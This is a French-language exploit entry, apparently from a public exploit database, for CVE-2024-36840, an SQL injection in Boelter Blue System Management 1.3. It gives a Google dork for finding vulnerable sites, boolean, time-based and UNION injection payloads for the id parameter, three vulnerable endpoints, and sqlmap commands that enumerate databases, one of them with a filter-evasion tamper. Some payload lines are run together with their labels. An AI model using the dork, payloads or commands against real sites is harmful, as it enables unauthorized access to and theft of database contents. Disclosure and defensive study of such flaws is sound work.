
Exploit pour : CVE-2024-36840 : Vulnérabilité d'injection SQL dans Boelter Blue System Management (version 1.3)
Titre de l'exploit : Vulnérabilité d'injection SQL dans Boelter Blue System Management (version 1.3)
Google Dork original : inurl:"Powered by Boelter Blue" (n'a pas fonctionné (zéro URL dans la recherche))
Google Dork par Theexploiters : intext:"Powered by Boelter Blue" (fonctionne)
Date : 2024-06-04
Auteur de l'exploit : CBKB (DeadlyData, R4d1x)
Page d'accueil du fournisseur : Boelter Blue
Lien du logiciel : Google Play Store
Version : 1.3
Testé sur : Linux Debian 9 (stretch), Apache 2.4.25, MySQL >= 5.0.12
CVE : CVE-2024-36840
Plusieurs vulnérabilités d'injection SQL ont été identifiées dans Boelter Blue System Management (version 1.3). Ces vulnérabilités permettent aux attaquants d'injecter et d'exécuter des commandes SQL arbitraires via divers paramètres. Une exploitation réussie peut entraîner un accès non autorisé, une exfiltration de données et d'éventuelles prises de contrôle de comptes.
Paramètre : id (GET)
id=10071 AND 4036=4036Type : aveugle basé sur le temps
id=10071 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)Type : requête UNION
id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,...news_details.php?id
https://www.example.com/news_details.php?id=10071sqlmap -u "https://www.example.com/news_details.php?id=10071" --random-agent --dbms=mysql --threads=4 --dbs
services.php?section
https://www.example.com/services.php?section=5081sqlmap -u "https://www.example.com/services.php?section=5081" --random-agent --tamper=space2comment --threads=8 --dbs
location_details.php?id
https://www.example.com/location_details.php?id=836sqlmap -u "https://www.example.com/location_details.php?id=836" --random-agent --dbms=mysql --dbs